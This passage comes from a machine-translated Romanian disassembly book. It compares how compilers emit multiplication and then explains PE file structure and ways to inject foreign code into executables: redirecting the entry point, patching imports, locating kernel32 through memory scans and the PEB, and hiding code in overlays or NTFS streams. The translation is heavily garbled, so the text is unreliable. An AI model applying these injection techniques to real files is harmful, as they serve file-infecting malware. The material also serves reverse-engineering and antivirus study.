org/optimize/ Partea III Identificarea structurilor cheie ale limbilorde nivel înalt MOV EAX, [EBP+VAR A];Ne încărcăm Valoarea EAX a variabilei var a Shl eah, ;Înmulțiți ѵag a cu push eah;Transmitem funcțiile de lucru printf ѵAG A * Offset Axxx Printf ESP, LOH Push Call Adăugare;Printf (" %x %x %x \ n", vara * oxd) mov esp, ebp pop ebp;Închidețicadrul stivei, retn principal endp minus apelând la funcția printf și încărcând variabila ѵAG A din memorie pentru totce este despre totul necesită doar trei tacturi de procesor Și ce se va întâmpla dacă acest exemplu este compilat înmodul de optimizare maximă (cu cheia /o)?Rezultatul compilării este prezentat în lista ;Listarea Rezultatulcompilării exemplului care demonstrează identificarea operatorului;înmulțire folosind Microsoft Visual C ++ în modul deoptimizare maximă;Cod xref: start+af-vp proc aproape de push e;Subliniem memoria pentru variabila locală ѵAG A mov eax,[esp+var a];Încărcăm valoarea variabilei var a în EAX ;Edx;Aici ;Mai mult, într -un singur (') tact Da, ambeleinstrucțiuni LEA sunt în regulă;Se împerechează pe Pentium Mmx și Pentium Rgo ', astfel încât compilatorul a reușit săse înmulțească ѵag a cu , esh eah* ;ECX PUSH PUSH;Trimiteți funcțiile printf var a * și var a * shl eah, ;Înmulțiți ѵag a cu Push Push Call GPAV Identificarea operatorilor matematici Adăugare esp, H;Printf ("%x %x \ n", var a * , var a * + , var a * ) Retn principal Endp Acest cod, cu toate acestea, nu este încă mai rapiddecât cele nepetimizate (vezi lista ) și este pus în Același trei tact, dar în alte cazuri, câștigul poate fidestul de vizibil Alți compilatori folosesc, de asemenea, LEA pentru a multiplica rapid numerele Aici, de exemplu,Borland acționează așa cum se arată în lista Listarea Rezultatul compilării exemplului care demonstreazăidentificarea operatorului de înmulțire folosind Borland C ++ Main Proc în apropiere Date xref: date: ^ LEAEDX, [EAX+EAX* ];Edx = var a* mov ecx, eax;Încărcăm variabila de înregistrare VAR A încorporată în ECX Shl ecx, ;Ecx =var a * push ebp;Salvăm EBP Adăugare ECX, ;Adăugați la var a * valoarea ;Borland nu folosește LEA pentruadăugare Și este un pas de milă edx, [eax+edx* ];Edx = var a + (var a * ) * = var a * ;Dar în acest Borland și MS suntunanime :-) Mov Ebp, esp;Deschidem cadrul stivei;Da, da, așa deschidem funcția;Mai sus, apropo, echipa „pierdută”împinge Heb Împingeți edx;Transferul de lucru printf var a * shl eah, ;Înmulțiți ((ѵag a * ) + ) cu ;Ce este? Da, acesta este un glitch al unui compilator care l -a considerat: de la o variabilă;ѵAG A nu este inițializată, atuncinu poate fi încărcat cu Push Ech Push Push Offset AHHH;" %x %x %x \ n" apel printf add esp, loh xor eax, eAx pop ebpretn main endp partea III Identificarea structurilor cheie ale limbilor de nivel ridicat, deșiBorlandul „vizual” generează un cod mai „plictisitor”, execuția sa este pusă în aceleași trei tacturi de procesor Un altlucru este Watcom, care arată un rezultat deprimant înapoi pe fundalul celor două compilatoare anterioare (lista ) Listarea Rezultatul compilării exemplului care demonstrează identificarea operatorului / înmulțiriifolosind compilatorul WATCOM cu proc principal în apropierea Push EBX;Salvați EBX în stivă Mov eax, ebx;Încărcămvaloarea unui registru inexplicat în EAX;variabilă ѵag a Shl eah, ;Eax = var a * sub eah, ebx;Eax = var a * - var a= var a * ;Iată ce watcom!Mai întâi se înmulțește „cu o marjă”, apoi de prisos;Elimină shl eah, ;Eax = ѵag a * * =var a * Adăugare eAH, ebx;Eax = var a * + var a = var a * ;Deci da?Patru instrucțiuni, în timp ce „urât” pentrumulți;Microsoft Visual C ++ este destul de costisitor de două 'push EAH;Trimiteți valoarea printf ѵAG A * MOV EAX,EBX;Încărcăm în EAC valoarea registrului non -modificat;variabilă ѵag a Shl eah, ;Eax = ѵag a * Adăugați eah, ;Eax =oag a * + ;Da, același lucru nu știe să folosească Le Watcom!PUSH EAH;Trimiteți valoarea printf ѵag a * + Shl ebx, ;Ebx = var a * push ebx;Trimiteți printf var a * apăsați apelarea apelului axxx printf ;" %x %x %x %x \ n 'gpava Identificarea operatorilor matematici Adăugare esp, h; printf (" %x %x \ n ", var a* , vara * + , var a * ) Pop Ebx Retn Main Endp Ca urmare, codul generat de compilatorul WATCOM necesită șaselovituri, adică de două ori mai mult decât concurenții Operatorii cuprinzători co \ c ++ diferă favorabil demajoritatea concurenților lor cu sprijinul operatorilor complexi : x = (unde operatorul elementar X forma este exprimatăprin construcții banale a = a + și a = a - , nu Reprezentând niciun interes pentru noi, dar formularul postfix este o altă problemă Partea a IV-a Metode avansate dedemontare avansată Capitolul Demontarea Re-Files Re-Files Introducerea unui cod străin în re-fișiere este o ocupațiepromițătoare și non-banală, interesantă nu numai pentru scriitorii de virusuri, ci și de creatorii de protectori/pachețicu balamale inclusiv În ceea ce privește partea etică a problemei, politica de a deține tehnologii avansate sub pânză nuface decât să crească scara epidemiilor virale Când vine vorba de luptă, niciunul dintre programatorii aplicați (șiadministratorii!) Se dovedește a fi gata pentru asta În tabăra programatorilor de sistem, lucrurile sunt și mai rele Nuexistă texte inițiale ale sistemului de operare, re-formatul este cumva documentat, comportamentul încărcătorului desistem nu se supune deloc de logică, iar DizAssempsing nu garantează încă că restul încărcătorilor se vor comporta exactla fel Până în prezent, nu există un ambalaj/protector mai mult sau mai puțin corect pentru Windows, care acceptă pedeplin specificația proprietar și ia în considerare subcarca comportamentului încărcătorilor de sistem din sistemele deoperare ale familiei Windows Despre diverse emulatoare, cum ar fi Wine, Doswin , nu vom spune mai bine nimic, deșisuntem tentați să spunem că fișierele ambalate aspack în mediul doswin nu sunt deloc lansate sau funcționează extremde instabil, ci toate pentru că aspack -ul ambalabil nu corespunde specificațiilor, bazându -se pe acele caracteristiciale încărcătorului de sistem, continuitatea căreia nimeni nu a promis nimănui În cel mai bun caz, autorii emulatoriloradaugă cod de bypass la produsele lor, dar în cel mai rău caz - lasă totul „așa cum este” Și restaurarea obiectelorafectate?După infecție, multe fișiere refuză să funcționeze și o încercare de a le vindeca cu antivirus agravează doarsituația Fiecare profesionist care se respectă ar trebui să fie gata să curețe virusul manual, având nimic la îndemână,cu excepția editorului Hex!Același lucru este valabil și pentru eliminarea pachetelor/dezactivarea protectoarelor cubalamale De fapt, orice intervenție în structura fișierului executabil finalizat este un eveniment destul de riscant,iar șansa de a -și menține performanța pe toate platformele este destul de mică Cu toate acestea, dacă mai aveți nevoiede acest lucru, vă rugăm să vă relaționați la proiectarea codului implementat cu toată seriozitatea și să urmațirecomandările date în acest capitol Caracteristicile structurii re-fișierelor în implementări specifice au multedescrieri ale re-formatului, dar printre ele nu există un singur cu adevărat bun Specificația oficială, specificația deformat a fișierului obiectului executabil și comună Microsoft este scrisă într -un limbaj ambiguu și complicat pentruînțelegere Chiar și printre angajați, ultima versiune a acestei specificații poate fi descărcată lahttp://www microsoft com/whdc/ System/Platform/Firmware/Pecoff MSPX Partea IV Metodele avansate de dezasamblareMicrosoft nu au un consens cu privire la modul de interpretare a acestuia, iar diverse încărcătoare de sistem secomportă semnificativ inegal În ceea ce privește dezvoltatorii din al treilea parte, există complet confuzaici Înțelegerea structurii fișierului executabil finalizat nu vă oferă încă posibilitatea de a asambla în modindependent astfel de fișiere manual Sistemele de operare ne pun la punct cu restricții foarte stricte, adesea nu suntmenționate deloc în documentație și variază de la un sistem de operare la altul Demontarea la miez nu este completsărbătorită, ci pentru a se baza pe deplin pe rezultatele obținute fără a le verifica pe restul sistemului de operare,în niciun caz!Credința în specificație este cel puțin naivă, deoarece orice specificație este doar cuvinte, iar oricecod de program este doar un caz special de implementare Atât asta, cât și celălalt este inconsistent șischimbător Conceptele generale și cerințele pentru re-fișierele re-fișiere structural constă dintr-un titlu (antet), unaspect de pagină (pagina de imagine) și un opțional excesiv (oogiau) Reprezentarea re-fișării în memorie se numeștepractic (imagine virtuală) sau pur și simplu în cale și pe disc cu un fișier sau o imagine de disc Dacă opusul nu estestipulat, atunci imaginea virtuală este întotdeauna înțeleasă sub imagine Imaginea este caracterizată de două componentefundamentale - adresa încărcăturii de bază (bază de imagine) și dimensiunea (dimensiunea imaginii) În prezențainformațiilor mutate (tabelul de relocare/remediere), imaginea poate fi încărcată la adresa care este diferită de adresaîncărcăturii de bază și este atribuită direct sistemului de operare în sine Imaginea este împărțită în mod natural înpagini (pagini), iar fișierul în sectoare (sectoare) Mărimea virtuală a paginilor/sectoarelor este setată în mod clar întitlul fișierului și nu trebuie să coincidă cu Physical Bootloader de sistem necesită continuitate din imagine, dardocumentația ocolește această problemă de către parte Toate Lungimea dintre baza de imagine și (baza imaginii + dimensiunea imaginii) nu trebuie să fie prezentă o pagină fărăproprietar care nu aparține nici titlului, nici secțiunilor - un astfel de fișier pur și simplu nu va fiîncărcat Sectoarele fără proprietar din orice parte a fișierului pot fi la fel de mult pe care doriți Fiecare sectorpoate fi afișat pentru orice număr de pagini (o pagină la un moment dat), dar nicio pagină nu poate afișa mai mult de unsector în aceeași regiune a memoriei Pentru lucrul cu re-fișiere, sunt utilizate trei scheme de adresare diferite: □Adrese fizice, numite și indicatori brute sau deplasări (indicatoare brute/brute Offeset, sau doar compensare), număratede la începutul fișierului □ Adrese virtuale (adrese virtuale sau prescurtate ѵa) contorizate de la începutul spațiuluide adrese al procesului □ Adrese virtuale relative (adrese virtuale relative sau RVA prescurtate), numărate de la adresade descărcare de bază Toate aceste adrese sunt măsurate în octeți și stocate în semne pe de biți Paragrafele auieșit de mult timp și este păcat de fapt, există un al patrulea tip de adresare-RRA, care este descifrată ca adresărelativă brută (adrese relative brute) sau adresă relativă (adrese relativ relative) Aspectul de pagină este format dinuna sau mai multe secțiuni Patru atribute sunt asociate cu fiecare secțiune: adresa fizică a începutului secțiunii dinsecțiunea Fișier/dimensiune din fișier, adresa virtuală a secțiunii din memoria/dimensiunea secțiunii din memorie șiatributul caracteristicilor a secțiunii, care descrie adevărul accesului, caracteristicile procesării sale SIS maicorect despre datele de porțiune minimă (cuantică) egală cu frecvența aleasă de aliniere a Nadisk și în memorie, darcompletarea constantă a acestui lucru pe tastatură este Prea lung și obositor În R Toți indicatorii sunt pe debiți GPAVA Demontare de re-fișiere pe de biți cu un bootloader întunecat,etc Aproape vorbind, secțiunea are dreptul de a decide unde și unde să o încărcați Cu toate acestea, această libertateeste foarte condiționată și multe restricții sunt impuse asupra gamei de valori selectate Începutul fiecărei secțiuni înmemorie sau pe disc coincide întotdeauna cu începutul virtualului ^al trenurilor/sectoarelor, respectiv O încercare de acrea o secțiune care începe la mijloc este strict suprimată de un încărcător de sistem care refuză să proceseze unastfel de fișier La final, se dezvoltă o situație mai democratică, iar bootloader -ul nu necesită o secțiune virtuală(și, parțial, fizică) pentru a fi pictate de dimensiunea paginii În schimb, el nivelează independent secțiunile,umplându -și „cozile” cu zerouri, astfel încât nici o pagină (sectorul) nu poate aparține două sau mai multe secțiunisimultan De fapt, aceasta este o inflație continuă - care nu este nivelată (în titlu!) Mărimea este aliniată automat înaspectul paginii, prin urmare, autoritatea prezentată pentru verificare este o ficțiune continuă Toate secțiunile suntcomplet egale, iar tipul fiecăruia dintre ele este strâns legat de atributele sale interpretate într -un mod destul deambiguu și contradictoriu În realitate, avem două hardware și două atribute software: accesibile/scrise șipartajate/încărcabile (acestea din urmă - condiționat) Aici ar trebui să dansezi de aici!Orice altceva este din domeniulconceptelor abstracte „Secțiunea de cod”, „Secțiunea de date”, „Secțiunea de import” - nimic altceva decât expresiifigurative, un fel de rudiment de antichitate, care a rămas moștenit de la modelul segmentat al memoriei, când codul,datele și stiva au fost într -adevăr în diferite segmente și nu au fost reduse la unul, așa cum se întâmplăacum Structurile de servicii ale datelor (tabele de export, importuri, elemente mutate) pot fi localizate în oricesecțiune cu atribute de acces adecvate Odată ce regulile de ton bun au dictat să plaseze fiecare tabel în secțiuneapersonală, dar acum această tehnică este recunoscută ca învechită Acum a fost înlocuită de anarhie, iar conținutultabelelor de service este împletit cu un strat subțire pe parcursul paginii, care cântărește semnificativ algoritmul deimplementare în fișierul executabil Overli, în definiția sa canonică, care ajunge la partea „coadă” a fișierului care nueste încărcată în memorie, în re-fișierele pot fi localizate oriunde în discul incluzând imaginea din mijloc Într-adevăr, dacă mai multe sectoare fără proprietari sunt localizate între cele două secțiuni adiacente care nu suntprivatizate de o singură secțiune, atunci astfel de sectoare vor fi lăsate fără reprezentare în memorie și au toatemotivele să se considere suprapuse Cu toate acestea, cine se consideră ei înșiși este indiferent Este important cine îiconsideră alții, pentru o opinie că nimeni nu împărtășește granițe asupra schizofreniei De fapt, ele pot fi numitesupraalimente doar în sens figurat Specificația pentru re-fișierele acestui termen nu recunoaște și chiar cele maiprimitive, mecanismele de sprijin cu suprapuneri Win nu oferă (fără a număra, desigur, aport/ieșire primitivă) Atenţie!Acest capitol nu trebuie citit ca un roman de aventură sau un detectiv pentru a obține o înțelegere normală ainformațiilor descrise aici, va trebui să suprapuneți imprimeurile și, înarmați cu un editor hex Fișier pentru a „atingeîn mod independent mâinile” toate structurile descrise aici și stăpânește drumul!Când ajungeți la sfârșit, veți înțelegede ce unele fișiere ambalate aspack/asprpotect nu funcționează și cum să îl remediați, ca să nu mai vorbim de faptul căputeți crea fișiere absolut legale pe care niciun Dizassembler nu este DizAssembl în principiu!Structura re-fișieruluieste toate re-fișierele fără excepție (Fig ), inclusiv driverele de sistem, încep cu titlul MS-DOS (MZ Header), alcărui sfârșit este urmat de DOS-Muglushka (MS-DOS STUG DE MOD REAL sau doar ciot), care afișează de obicei un mesaj dedezamăgire pe ecran, deși în aproximativ de părți IV Metodele avansate de cazuri de dizassmitt în acesta pot fichiar încapsulate o versiune a programului pentru MS-DOS (deși aceasta este deja o raritate) Matt Pitrek în „Programareasistemului Secretele pentru Windows ” scrie că după ce bootloader-ul Win va afișa un re-fișier în memorie, primuloctet al afișajului fișierului corespunde primului BYAT al dosului dos Nu este adevarat!Primul octet al afișajuluicorespunde primului octet al fișierului în sine, adică afișajul începe întotdeauna cu semnătura MZ, care poate fiverificată cu ușurință prin încărcarea fișierului în debugger și analizând depozitele sale MS-DOS (MZHEADER) MS-DOS-Doos-Doos-Doos-Gold Gold Format Format al reale Real Re »MMA File Semnătură Reed Titlu Titlu Reed Reed A Secțiune Secțiune Secțiunea SECȚIUNEA SECȚIUNII BSS SECȚIUNEA RDATA SECȚIUNEA DEBUG FIG Imaginea schematică astructurii re-fișării re-volumelor, în marea majoritate a cazurilor, începând direct la sfârșitul grinzului DOS, poatefi de fapt localizată oriunde în fișier-chiar în mijloc, chiar și chiar În final, din moment ce bootloader își determinăpoziția prin dublu cuvânt e lfanw, s -a schimbat pe un octet ch de la începutul fișierului Releul este o structură dedate ISH-Byte care descrie caracteristicile fundamentale ale fișierului și care conține semnătura re \ x \ x , conformcăreia este identificat fișierul Direct la sfârșitul releului, un titlu opțional (opțional) urmărește structura paginiiprivind mai detaliat (adresa de bază a sarcinii, dimensiunea imaginii, gradul de aliniere-toate acestea sunt setatemulte altele în ea) Numele „opțional” nu este ales foarte bine și se corelează slab cu realitatea din jur, deoarece fărăo rubrică opțională, fișierul pur și simplu nu se va încărca În acest caz, deci ceea ce M Pitrek „Secretele programăriisistemului în Windows ” -Kiev: dialectică, GPAVA Dezasamblare pe de biți re-fișiere este atunci „opțional” dacă este exact obligatoriu?Cu toate acestea, atuncicând re-formatul a fost dezvoltat doar, totul a fost diferit, iar acum suntem nevoiți să tragem moștenirea antichitățiidin spatele nostru O structură importantă a titlului opțional este structura Data Directory, care este o serie deindicatori pentru structurile de date subordonate, inclusiv: tabele de export și import, informații de depanare, tabelulelementelor mutate etc byte, dar poate varia în acea sau cealaltă parte, care este determinată prin umplerea structuriidate directory, precum și cantitatea de gunoi la capătul său Poate părea amuzant, dar dimensiunea titlului opționaleste stocată în re-mașină, astfel încât aceste două structuri sunt strâns interconectate La sfârșitul titlului opțional,este urmat un teritoriu suveran ocupat de secțiunea secțiunilor Afilierea sa politică este foarte condiționată Nuaparține niciunui titlu și, aparent, este o rubrică independentă de tipul fără nume O implementare rară în fișierulexecutabil este completă fără a edita tabelul secțiunii, astfel încât această structură este de o importanță esențialăpentru noi La sfârșitul mesei secțiunilor, s -a răspândit mlaștina mlăștinoasă din regiunea Nyeen, care nu aparține nicititlurilor sau secțiunilor Această zonă a fost formată ca urmare a alinierii adreselor fizice ale secțiunilor la maimulte adrese În funcție de o serie de circumstanțe, în detaliu analizate pe parcursul prezentării materialului, aceastămemorie poate fi afișată atât în ​​spațiul de adrese al procesului, cât și nu este afișat pe acesta Ar trebui să fietratat cu acesta extrem de atent, deoarece poate exista suprapunerea, codul executabil al cuiva sau structura de date-unexemplu, un tabel cu importuri Începând cu deplasarea (brut offseet) a primei secțiuni indicate în tabelul secțiunii,imaginea paginii se extinde, sau mai degrabă - Imaginea sa de disc ambalată „Ambalat” în sensul că dimensiunile fizice ale secțiunilor (luând în considerare nivelarea)includ doar date inițializate și teoretic nu conțin nimic de prisos Mărimea virtuală a secțiunilor poate depășisemnificativ fizic, ceea ce se întâmplă cu secțiuni de date tot timpul Secțiunile sunt întotdeauna simplificate înmemorie, care nu se poate spune despre imaginea discului În plus față de „găurile” rămase de la nivelare, suprapunerilepot fi localizate între secțiuni În plus, procedura de urmărire a secțiunilor din memorie și pe disc nu coincideîntotdeauna Unele secțiuni au o reprezentare permanentă în memorie, altele sunt utilizate doar pentru perioada deîncărcare, la sfârșitul căreia în orice moment poate fi expulzat necondiționat de acolo (nu resetați la swap, și anumeexpulzat) În ceea ce privește a treia, ei nu pornesc niciodată în memorie, bine, cu excepția părților În special,secțiunea cu informații de depanare se comportă în acest fel Cu toate acestea, informațiile de depanare nu trebuie săfie emise sub forma unei secțiuni separate și, mai des, este „montat” în fișier sub forma unui excesiv La sfârșitulultimei secțiuni, de obicei, există o anumită cantitate de octeți de gunoi lăsați de compoter în neglijență Acest lucrunu este copleșitor (nu i se întâmplă apeluri), deși ceva foarte similar cu acesta este foarte similar Desigur, potexista mai multe suprapuneri - încărcătorul de sistem nu impune nicio restricție în acest sens, dar nu oferă mecanismeunificate pentru a lucra cu suprapuneri Programul, care și -a creat suprapunerile, este obligat să lucreze cu el pe contpropriu, folosind ARI Intput/Concluzion Pe scurt, reprezentarea fizică a fișierului executabil este o adevărată păturăde patchwork, care amintește de harta politică a lumii în stilul „Color Yourself” Rețineți o descriere completă șidetaliată a structurii re-fișării din versiunea tipărită a acestei cărți nu oferă o descriere mai detaliată a celor maiinteresante și puțin cunoscute câmpuri, proprietăți și caracteristici ale dacă există gunoi acolo, Deși esterecomandat cu tărie să evitați , cu toate acestea, „concluzia” nu funcționează în principiu, deoarece fișierul încărcateste disponibil doar pentru citirea și scrierea în el este strâns blocată Partea IV Metode avansate de dezasamblarea re-fișierelor pot fi găsite pe CD, care sunt furnizate cu această carte , cu toate acestea, chiar și aceste informațiinu sunt complete, astfel încât cititorilor interesați să fie recomandate să citească cartea menționată anterior de MattPitrek, specificația oficială a Microsoft și studiați cu atenție fișierul WMNT H, SDK-ul platformei Windows face partedin produs, care este disponibil pentru descărcare gratuită de pe site-ul oficial Microsoft, tehnica implementării șiștergerii codului de la re-fișiere strict vorbind, este mai bine să nu să nu o faceți Atingeți fișierul executabil alaltcuiva, întrucât nu se știe dinainte la ce este exact legat și la ce structuri de date controlează pe de altă parte,comportamentul marea majoritate a fișierelor este destul de previzibil și poate fi încă introdus în ele Mecanismele deimplementare în re-fișiere sunt foarte diverse, dar sunt descrise destul de superficial în literatura de specialitateaccesibilă Această secțiune este o încercare de a sistematiza și clasifica toate metodele de implementarecunoscute Materialul va fi interesant nu numai pentru specialiștii în domeniul securității informațiilor, specializateîn identificarea și eliminarea virușilor, ci și pentru dezvoltatorii de protecție și pachete cu balamale Scopul săuprincipal este să arate ce modalități de implementare există, ce să acorde atenție atunci când găsim un cod străin și,de asemenea, cum să reparați un fișier deteriorat de implementarea incorectă Conceptul de cod X și alte convenții, careeste introdus în fișier, se va numi codul X Această definiție se încadrează pe orice cod pe care l -am introdus înfișierul de transport, de exemplu, instrucțiuni NOP În cazul general, nu se știe nimic despre abilitățile de reproducereale codului X și, pentru simplitate, vom considera codul X non-umor Persoana care lansează programul prevedeimplementarea asigură toată responsabilitatea pentru implementare Acest program, care a convins anterior prezențadrepturilor de intrare la fișierul de transport (și aceste drepturi sunt date din nou unei persoane) și compatibilitateaacesteia cu strategia de implementare selectată, înregistrează codul X în fișier și efectuează interceptarea controluluide înaltă calitate Pentru a economisi spațiu în text, se folosesc următoarele reduceri general acceptate: □ aliniereafa -file -alinierea fizică a secțiunilor □ SA, alinierea OD -secțiune sau alinierea obiectelor -Alinierea revoltă asecțiunilor □ RVA Ristial -rarist -Fists -Relative -Relative Adresa virtuală -FIS Prima secțiune a fișierului □ LS -Ultima secțiune - Ultima secțiune a fișierului □ CS - Secțiunea curentă - Secțiunea curentă a fișierului □ NS -Secțiunea următoare - Următoarea secțiune □ ѵ a - Adresa virtuală - virtuală Adresa V S - Dimensiune virtuală - Dimensiune virtuală întreaga linie NT este implicată - Sisteme de operare similare: Windoyys NT /Windows /Windows XP și mai nou, și sub Windows X - Windows , Windows și Windows ME Acest material este în catalog>: \ part \ ch \ suplementar GPAVA Demontați re-fișiere pe de biți În cadrul încărcătorului desistem se înțelege componenta sistemului de operare responsabil pentru încărcarea fișierelor executabile și abibliotecilor dinamice Mai sus, la stânga, spre vest, corespunde adreselor mai mici, care coincide cu schema naturalăpentru afișarea memoriei de dump de către un debugger sau dizassembler Obiectivele și obiectivele codului X înainte decodul X sunt cel puțin trei sarcini serioase: Puneți corpul în fișierul țintă Controlul capturii înainte deînceput sau în timpul implementării programului principal Determinați adresele funcțiilor ARI care sunt vitale pentrupropriile funcționări Interceptarea controlului este de obicei realizată prin următoarele moduri □ Reinstalareapunctului de a intra în corpul codului X □ Introducere în vecinătatea punctului inițial de a intra în comanda detranziție la codul X Desigur, înainte de transferul de gestionare, codul X trebuie să șteargă comanda, restabilindconținutul inițial al EP □ Reinstalarea comenzii preluate în mod arbitrar de JMP/Call în corpul codului X, urmată detransferul de control la adresa inițială Această tehnică nu garantează că codul X poate primi în general controlul, darîi oferă un secret fenomenal și o protecție maximă împotriva antivirusurilor □ Modificarea unuia sau mai multor elementeale tabelului de import pentru a înlocui funcțiile cauzate cu ale sale Această tehnologie este folosită în principal deviruși stealth, ascunzându -și cu pricepere prezența în sistem Determinarea adreselor funcțiilor Ari este de obiceirealizată prin următoarele moduri: □ Căutarea funcțiilor necesare în bordul vehiculului de lansare Fii pregătit pentrufaptul că nu vor fi acolo În acest caz, fie refuzați să implementați, fie utilizați o altă strategie de căutare □Căutați prin LoadLibrary/GetProCaddress în bordul vehiculului de lansare, cu importul ulterior toate funcțiile necesaremanual Fiți pregătiți pentru faptul că aceste funcții din tabelul de import nu vor fi, de asemenea, □ Un apel direct alfuncțiilor ARI la adresele lor absolute, scris rigid în interiorul codului X Adresele funcțiilor suntkernel dll/ntdll dll sunt instabile și se schimbă de la o versiune la sistem la alta, iar adresele User dll și toatecelelalte biblioteci de utilizator sunt instabile chiar și în cadrul unui sistem specific și variază în funcție de pebaza de imagine a bibliotecilor încărcate rămase Prin urmare, pentru toată popularitatea acestei metode, este permisănumai în scopuri educaționale și cognitive □ Adăugarea funcțiilor necesare pentru importul codului X necesar, care, deregulă, sunt încărcături/getProcadress, cu care puteți trage sistemele și toate celelalte din intestine (un mod destulde fiabil, deși prea vizibil )□ Căutare directă a funcțiilor LoadLibrary/GetProCaddress în memorie Deoarece kernel dlleste proiectat pe spațiul de adresă al tuturor proceselor, iar adresa sa de bază este întotdeauna nivelată de -a lungulgraniței de kb, trebuie doar să scanăm prima jumătate a spațiului țintă al procesului, pentru a căuta semnătura MZ Dacă se găsește o astfel de semnătură, suntem convinși de prezența unei re -regalate de deplasarea E LFANEW de laînceputul adresei de descărcare de bază Dacă este într -adevăr prezent, analizăm structura directorului de date șideterminăm adresa tabelului de export în care este necesar să se găsească LoadLibraya și GetProcadress Dacă cel puținuna dintre aceste condiții nu coincid, reduceți indicatorul cu kb și repetați întreaga procedură din nou Câtevaconsiderente: Înainte de a citi ceva din memorie, apelați funcția IsbadReadPtr, asigurându -vă că Partea IV Metodeavansate DizAsMitter au dreptul să facă acest lucru Amintiți -vă că Windows Advanced Server și Datacenter Serveracceptă parametrul de încărcare / GB, care oferă GB RAM și schimbarea graniței de scanare cu GB Pentru a simplificaidentificarea kernel dll, puteți utiliza câmpul RVA Numele conținut în tabelul Directory Export și indicând numelebibliotecii dinamice Cu toate acestea, trebuie amintit că acest câmp poate fi subfinit (încărcătorul de sistem îlignoră) □ Determinarea adresei funcției kernel ' except handler , care este indicată de procesorul de excepțiestructurală pentru Mod implicit Această funcție nu este exportată de nucleu, ci este prezentă în debrierea personajelor care pot fidescărcate de pe următorul server http://msdn microsoft com/download/symbols Acest lucru se face astfel: Mov ESI, FS:[ ] /LODSD /LODSD După efectuarea codului, Registrul EAH conține o adresă care se află undeva în adâncul kernel /dll Îlaliniem de -a lungul graniței de kb și căutăm semnătura MZ/PE, așa cum se arată în paragraful anterior Acesta estecel mai corect și mai de încredere mod de a căuta, în toate modurile recomandate pentru utilizare □ Determinarea adreseide descărcare de bază Kernel dll prin ROAR : MOV EAX, FS: [ZONA]/MOV EAX, [EAX + CH]/MOV ESI, [EAX + ICH]/LODSD/MOVEBX, [EAX + H] , - - Codul de bază este returnat în registrul EVOS Aceasta este o tehnică foarte simplă, deșinesigură, deoarece structura urletului se poate schimba în orice moment Pentru tot timpul existenței Windows, aceasta aschimbat deja, de cel puțin trei ori, în plus, există doar un urlet în Windows NT □ Folosind un sistem de operare ARInative, interacțiunea cu care se realizează fie prin Inter FH (Windows ѵ), fie prin întreruperea Int EH (Windows NT,Windows ), fie prin Syscaii (Windows XP Machine) O scurtă listă de funcții de bază poate fi găsită în lista deîntrerupere a Ralph „Lista de întrerupere”, distribuită liber pe Internet: http://www cttyme com/rbron htm Acesta estecel mai mult timp -conștientizarea și cel mai puțin fiabil mod de toate Nu numai că funcțiile autohtone nu numai că suntsubcorporale și sunt supuse unor schimbări constante, dar sunt și primitive, adică realizează cele mai simple funcții denivel scăzut care nu sunt potrivite pentru utilizare directă Principiile introducerii codului X în re-fișierele dintr-unpunct de vedere tehnic nu sunt practic diferite de principiile similare ale introducerii codului în fișierele ELF, cuexcepția, poate, de numele câmpurilor oficiale și de strategie de modificarea lor Cu toate acestea, o analiză detaliatăa specificațiilor și a dizassMitting -ului încărcătorului de sistem relevă un întreg strat de subtilități necunoscutechiar și profesioniștilor În orice caz, până în prezent, nici o singură bandă/pachet nu a scăpat de erori brute deproiectare și implementare Există următoarele metode de implementare: A plasarea codului X pe partea de sus aprogramului original (numit și Grouting);În plasarea codului X în locul liber al programului (integrare);C Conducereacodului X la începutul, mijlocul sau sfârșitul fișierului cu păstrarea conținutului inițial;D plasarea codului X înafara corpului principal al vehiculului de lansare (de exemplu, în biblioteca dinamică sau fluxul NTFS), încărcat cu„capul” codului X, încorporat în fișier prin metoda A, B sau C Deoarece metoda A duce la pierderea ireversibilă aperformanței, programul inițial este utilizat cu adevărat doar la viruși, aici nu este luat în considerare Toți ceilalțialgoritmi de implementare sunt complet sau parțial reversibile Rețineți că serverul nu acceptă vizualizareabrowserului și doar cele mai recente versiuni ale debuggerului Microsoft Kernel și Numega Softlce funcționează cuacesta Structura Roar (Process Environment Block) conține toți parametrii regimului de utilizator, asociați cu thesystem of the GPAV Disassemble -detachment Re-files The requirements for theX-code X-code should be designed taking into account the entire rigidity of the requirements for an unknown andsometimes very aggressive environment of foreign code , în care este } copilul este introdus În primul rând, codul X artrebui să fie complet mutat, adică pentru a-și menține performanța indiferent de adresa de descărcare de bază Acestlucru se realizează prin utilizarea adresării relative: după ce a determinat locația actuală prin apelul apelului $ + /ROR HEB, codul X va putea converti deplasările din interiorul corpului său în adrese eficiente prin adăugarea simplăei cu Evrei Desigur, aceasta nu este singura schemă Există și altele, dar nu ne vom lăsa pe ei, deoarece nu au niciunmotiv pentru re-fișiere În al doilea rând, un cod X bine construit nu își modifică niciodată celulele, deoarece nu știe:are dreptul de a înregistra sau nu secțiunea de cod standard este lipsită de atributul Image SCN MEM WRITE și esteextrem de nedorit să-l atribuim, deoarece Aceasta nu este doar demascarea codului X , dar reduce și imunitateaprogramului de transport, desigur, atunci când este implementată în secțiunea de date, această restricție își pierderelevanța, cu toate acestea, departe de toate cazurile, înregistrarea din secțiunea de date este permis Optimismul esteminunat, dar programatorul ar trebui să se bazeze pe cel mai rău scenariu al evenimentelor Desigur, acest lucru nuînseamnă că codul X nu este posibil să fie automedificat sau nu ar trebui să modifice nicio celulă de memorie îngeneral!La serviciul și stiva sa (memorie automată), și memoria dinamică (grămadă) și sticla inelară a însoțirii, însfârșit!În al treilea rând, codul X ar trebui să fie extrem de compact, Deoarece volumul de spațiu potrivit pentru implementare este uneori foarte limitat Trebuie să rupă o diviziune a coduluiX în două părți: un bootloader minuscul și o „coadă” mai lungă Bootloader-ul este cel mai bine plasat într-o secvență dere-amenajare sau regulat în interiorul fișierului și aruncă coada în fluxuri de suprapuneri sau NTFS, combinând astfeldiverse metode de implementare În cele din urmă, codul X nu își poate permite să rețină controlul mai mult de câtevasute, din puterea zecimilor de secunde, altfel faptul implementării va deveni prea vizibil și va fi foarte nervosutilizatorul, ceea ce în niciun caz nu este imposibil de introdus Codul X înainte de implementare, trebuie să văasigurați că nu este un driver, nu conține tabele non -standard în directorul de date și este disponibil pentrumodificare Prezența suprapunerii este extrem de nedorită și, fără a fi nevoie, este mai bine să nu implementați nimic înfișierul suprapus și, dacă implementați, atunci respectați cea mai nedureroasă strategie de implementare - A Strategiava analiza aceste cerințe mai detaliat: □ Dacă fișierul este localizat pe media protejată de înregistrare sau nu suntemsuficient de 